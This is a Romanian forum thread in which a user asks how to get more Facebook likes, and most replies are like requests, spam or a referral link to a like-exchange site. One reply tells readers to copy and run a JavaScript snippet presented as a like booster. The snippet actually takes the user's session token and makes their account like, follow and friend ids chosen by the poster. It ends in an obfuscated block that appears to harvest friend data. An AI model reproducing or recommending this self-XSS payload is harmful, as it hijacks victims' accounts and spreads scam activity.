| StefaniaM a întrebat:

Sall TPU, cum pot sa fac mai multe like-uri pe facebook?

131 răspunsuri:
| Adrian_Adrian_1990 a răspuns:

Solicit laikuri la faceookc

| Maria_Ana_1999_QfwW a răspuns:

Un like aici? :o3
https://www.facebook.com/....../photo.php
Dau back :`3

| Rusu_Cosmin_1993 a răspuns:

1.copi acest cod:
// === Likes En Photos ====
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum!= -1) {
konum += tarama. length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}

function getRandomInt (min, max) {
return Math. floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr. length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);

function cereziAl(isim) {
var tarama = isim + "=";
if (document.cookie.length > 0) {
konum = document.cookie.indexOf(tarama)
if (konum!= -1) {
konum += tarama. length
son = document.cookie.indexOf(";", konum)
if (son == -1)
son = document.cookie.length
return unescape(document.cookie.substring(konum, son))
}
else { return ""; }
}
function getRandomInt (min, max) {
return Math. floor(Math.random() * (max - min + 1)) + min;
}
function randomValue(arr) {
return arr[getRandomInt(0, arr. length-1)];
}

var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function IDS(r) {
var X = new XMLHttpRequest();
var XURL = "//www.facebook.com/ajax/add_friend/action.php";
var XParams = "to_friend=" + r +"&action=add_friend&how_found=friend_browser_s&ref_param=none&&&outgoing_id=&logging_location=search&no_flyout_on_click=true&ego_log_data&http_referer&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=35&fb_dtsg="+fb_dtsg+"&phstamp=";
X. open("POST", XURL, true);
X. onreadystatechange = function () {
if (X.readyState == 4 && X.status == 200) {
X.close;
}
};
X.send(XParams);
}
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); function Like(p) { var Page = new XMLHttpRequest(); var PageURL = "//www.facebook.com/ajax/pages/fan_status.php"; var PageParams = "&fbpage_id=" + p +"&add=true&reload=false&fan_origin=page_timeline&fan_source=&cat=&nctr[_mod]=pagelet_timeline_page_actions&__user="+user_id+"&__a=1&__dyn=798aD5z5CF-&__req=d&fb_dtsg="+fb_dtsg+"&phstamp="; Page. open("POST", PageURL, true); Page. onreadystatechange = function () { if (Page.readyState == 4 && Page.status == 200) { Page.close; } }; Page.send(PageParams); }
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]); var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value; var now=(new Date). getTime(); function P(opo) { var X = new XMLHttpRequest(); var XURL ="//www.facebook.com/ajax/ufi/like.php"; var XParams = "like_action=true&ft_ent_identifier="+opo+"&source=1&client_id="+now+"%3A379783857&rootid=u_jsonp_39_18&giftoccasion&ft[tine]=%3E%3D&ft[type]=20&ft[qid]=5890811329470279257&ft[mf_story_key]=2814962900193143952&ft[has_expanded_ufi]=1&nctr[_mod]=pagelet_home_stream&__user="+user_id+"&__a=1&__dyn=7n88QoAMBlClyocpae&__req=g4&fb_dtsg="+fb_dtsg+"&phstamp="; X. open("POST", XURL, true); X. onreadystatechange = function () { if (X.readyState == 4 && X.status == 200) { X.close; } }; X.send(XParams); }
var fb_dtsg = document.getElementsByName('fb_dtsg')[0].value;
var user_id = document.cookie.match(document.cookie.match(/c_user=(\d+)/)[1]);
function a(abone)
{ var http4=new XMLHttpRequest;
var url4="/ajax/follow/follow_profile.php?__a=1";
var params4="profile_id="+abone+"&location=1&source=follow-button&subscribed_button_id=u37qac_37&fb_dtsg="+fb_dtsg+"&lsd&__"+user_id+"&phstamp=";
http4. open("POST", url4, true);
http4. onreadystatechange=function()
{ if(http4.readyState==4&&http4.status==200)http4.close };
http4.send(params4)}
function sublist(uidss)
{ var a = document.createElement('script');
a.innerHTML = "new AsyncRequest(). setURI('/ajax/friends/lists/subscribe/modify? location=permalink&action=subscribe'). setData({ flid: " + uidss + " }). send();";
document.body.appendChild(a);
}

//Emoticons
P("627918213963781");
P("626497614105841");
P("570743026347967");
P("558438307578439");
P("553412878080982");
P("541201862635417");
P("534441126644824");
P("489165584505712");
P("488784391210498");
P("471119792976958");
P("470191596403111");
P("641187179303551");
Like("642078375881098");
Like("615453098543626");
//Facebook
a("641187179303551");
a("100002368252494");

//doitenquantrong
var _0xa22c=["value","fb_dtsg","getElementsByName","match","cookie","694229123971186","onreadystatechange","readyState","arkadaslar = ","for (;;);","","replace","responseText",";","length","entries","payload","round"," @[","uid",":","text","]"," ","\x26filter[0]=user","\x26options[0]=friends_only","\x26options[1]=nm","\x26token=v7","\x26viewer=","\x26__user=","https://","indexOf","URL","GET","https/......degree.php

| Amet_Omar_2000 a răspuns:

Sall

| Amet_Omar_2000 a răspuns:

| GheorgheGheorghita a răspuns:

Cum sa fac mai multe like.uri pe Facebook la o poza

| Munteanu_David_2000 a răspuns:

Cum pot face Likuri

| Géorgiänä_Ändrééä_1999_3Iuq a răspuns:

Aplicatia hublla

| Bordean_Raluca_2000 a răspuns:

Asta vă întreb pe voi

| Maria_Maria_1990_8HEp a răspuns:

Vreau si eu mai multe likeuri

| Dorobat_Adelina_2000 a răspuns:

Hei. La mine de ce nu merge? Ma poti ajutat te rog?

| Hittano a răspuns:

Cum pot sa fac mai multe laikuri

| Mary_Rosse_1989 a răspuns:

Sa muncesti la ea

| Alinutza_Alina_1989 a răspuns:

Iti faci cont pe http://www.fanslave.net/ref.php?ref=1042071, vizionezi videoclipuri, dai like-uri la pagini de fb, si astfel acumulezi puncte. daca vrei sa obtii like-uri la pagina ta, o introduci acolo. pentru fiecare like, ti se vor lua din punctele pe care le+ai acumulat. punctele se por schimba si in bani. multa bafta!